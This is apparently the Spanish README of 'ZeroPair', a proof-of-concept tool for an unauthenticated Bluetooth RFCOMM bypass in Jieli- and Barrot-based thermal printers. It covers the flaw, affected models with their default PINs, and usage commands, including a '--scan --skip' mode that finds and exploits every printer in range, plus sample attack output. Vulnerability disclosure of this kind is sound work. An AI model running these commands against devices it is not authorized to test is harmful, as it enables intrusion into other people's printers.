
Herramienta de prueba de concepto que demuestra la omisión del acceso Bluetooth RFCOMM sin autenticación en impresoras térmicas vulnerables.
Exploit Bluetooth de autenticación cero
"Roba la impresión, controla el sistema"
███████╗███████╗██████╗ ██████╗
╚══███╔╝██╔════╝██╔══██╗██╔═══██╗
███╔╝ █████╗ ██████╔╝██║ ██║
███╔╝ ██╔══╝ ██╔══██╗██║ ██║
███████╗███████╗██║ ██║╚██████╔╝
╚══════╝╚══════╝╚═╝ ╚═╝ ╚═════╝
██████╗ █████╗ ██╗██████╗
██╔══██╗██╔══██╗██║██╔══██╗
██████╔╝███████║██║██████╔╝
██╔═══╝ ██╔══██║██║██╔══██╗
██║ ██║ ██║██║██║ ██║
╚═╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═╝
Autor: [CBKB] DeadlyData | 2026
ZeroPair es una herramienta de prueba de concepto que demuestra una vulnerabilidad de autenticación cero en impresoras térmicas con Bluetooth que utilizan chipsets Jieli y Barrot. Los dispositivos afectados aceptan conexiones RFCOMM no autenticadas sin requerir emparejamiento ni interacción del usuario, lo que permite a un atacante dentro del alcance Bluetooth acceder a la interfaz de comandos de la impresora.
CVE: Enviado a MITRE (asignación pendiente)
| ZeroPair Proof of Concept |
Las impresoras térmicas con Bluetooth que utilizan chipsets Bluetooth Jieli y Barrot contienen una vulnerabilidad de bypass de autenticación en su servicio RFCOMM (SPP). Debido a un control de acceso inadecuado implementado en el firmware, los dispositivos afectados aceptan conexiones RFCOMM no autenticadas sin requerir emparejamiento ni interacción del usuario. La vulnerabilidad existe en un estado de confianza de firmware oculto que no puede inspeccionarse ni eliminarse con las herramientas estándar de gestión de Bluetooth.
| Clasificación | Severidad |
|---|---|
| Autenticación cero | Crítica |
| Confianza de emparejamiento persistente | Alta |
| Estado de emparejamiento oculto | Alta |
| Bypass de autenticación desconocido | Alta |
Otras impresoras térmicas Bluetooth que utilizan estos chipsets también pueden estar afectadas.
bluez - Pila de protocolos Bluetooth (hcitool, bluetoothctl, rfcomm, sdptool)Instalación en Debian/Ubuntu:
sudo apt install bluez
coloramapip install colorama
ZeroPair requiere privilegios de root para las operaciones RFCOMM.
Realiza una validación completa de vulnerabilidad en 4 pasos antes de la explotación:
sudo python3 ZeroPair.py <MAC_ADDRESS>
sudo python3 ZeroPair.py 66:32:9E:2E:FD:94
Omite la validación e intenta la explotación directa:
sudo python3 ZeroPair.py <MAC_ADDRESS> --skip
Escanea todos los dispositivos Bluetooth, identifica impresoras, valida y explota:
sudo python3 ZeroPair.py --scan
El modo más rápido: escanea y explota sin validación:
sudo python3 ZeroPair.py --scan --skip
bluetoothctl/var/lib/bluetooth/)Las impresoras afectadas implementan una política de aceptación RFCOMM permisiva a nivel de firmware. El controlador Bluetooth no aplica autenticación ni cifrado para las conexiones SPP entrantes. Debido a que el estado de confianza se gestiona en el firmware y no en la pila Bluetooth del host (BlueZ), herramientas estándar como bluetoothctl no pueden detectar, inspeccionar ni revocar la confianza implícita. El dispositivo acepta silenciosamente conexiones de cualquier host Bluetooth sin interacción del usuario.
[*] single target mode (validation enabled)
[*] ==========================================================
[*] target: 66:32:9E:2E:FD:94 (X6h-A725)
[*] model: X6h-A725
[*] ==========================================================
[*] starting vulnerability validation...
[*] testing user-space pairing visibility [DONE]
[*] identifying local bluetooth adapter [DONE]
[*] checking filesystem pairing cache [DONE]
[*] testing RFCOMM unauthenticated access [DONE]
[!] VULNERABILITY CONFIRMED
Type: ZERO AUTHENTICATION
Severity: CRITICAL
[*] vulnerability details:
[+] RFCOMM accessible: YES
[+] BlueZ visible: NO
[+] BlueZ paired: NO
[+] Cache exists: NO
[+] target is exploitable - proceeding with attack
[*] discovering RFCOMM channels [channel 1]
[*] establishing RFCOMM connection [CONNECTED]
[*] injecting ESC/POS payload [SUCCESS]
[*] exploitation successful - check printer output!
[+] exploitation completed successfully
Esta herramienta es únicamente para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. El autor no asume ninguna responsabilidad y no se hace responsable de cualquier uso indebido o daño causado por esta herramienta. Úsala de forma responsable y solo en sistemas que poseas o para los que tengas permiso explícito de prueba.
MIT
| Modelo | Fabricante | Chipset | PIN predeterminado | Conjunto de comandos |
|---|
| X6h-A725 | Zhuhai Jieli | Jieli | 1234 | ESC/POS |
| M58-L | Zhuhai Jieli | Jieli | 1234 | ESC/POS |
| D450 | Omezizy | Barrot | 0000 | TSPL |
| Argumento | Corto | Descripción |
|---|
target | Dirección MAC del objetivo (p. ej., 66:32:9E:2E:FD:94) | |
--scan | -a | Modo de escaneo automático: encontrar y explotar todas las impresoras |
--skip | -s | Omitir la validación de vulnerabilidad (más rápido) |